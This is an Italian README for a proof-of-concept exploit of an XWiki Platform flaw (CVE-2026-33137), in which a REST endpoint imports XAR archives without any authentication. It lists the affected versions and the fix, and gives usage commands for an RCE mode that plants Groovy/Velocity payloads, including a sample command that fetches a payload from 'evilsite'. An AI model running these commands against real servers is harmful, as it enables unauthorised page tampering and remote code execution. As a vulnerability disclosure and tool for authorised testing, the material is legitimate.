
XWiki Platform - CVE-2026-33137 PoC - Importazione XAR non autenticata tramite REST /wikis/{wikiName}
XWiki Platform - Importazione XAR non autenticata tramite REST /wikis/{wikiName}
L'endpoint dell'API REST POST /wikis/{wikiName} in XWiki Platform esegue un'importazione XAR (XWiki Archive) senza effettuare alcun controllo di autenticazione o autorizzazione. Un attaccante non autenticato può creare o aggiornare documenti arbitrari nel wiki di destinazione inviando un file XAR appositamente predisposto.
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Stato | Versioni |
|---|---|
| Vulnerabile | > 15.10.16, > 16.4.6, > 16.10.2 |
| Corretta | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
Un attaccante non autenticato può:
L'endpoint REST POST /xwiki/rest/wikis/{wikiName} accetta un file XAR nel corpo della richiesta e lo importa direttamente nel wiki senza verificare se il richiedente abbia diritti di ADMIN. La correzione (commit 4b7b95b) aggiunge un controllo di autorizzazione utilizzando ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)Il flag --rce importa pagine contenenti payload Groovy e Velocity che eseguono la stringa di comando specificata. Automaticamente:
{{groovy}} e {{velocity}}Requisiti per un RCE riuscito:
-u / --password)package.xml - descrittore del pacchetto{Space}/{Page}.xml - documento XML con contenutoQuesto PoC è fornito esclusivamente a scopo didattico e per test di sicurezza autorizzati. L'uso non autorizzato di questo exploit contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicito permesso di test è illegale. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo software.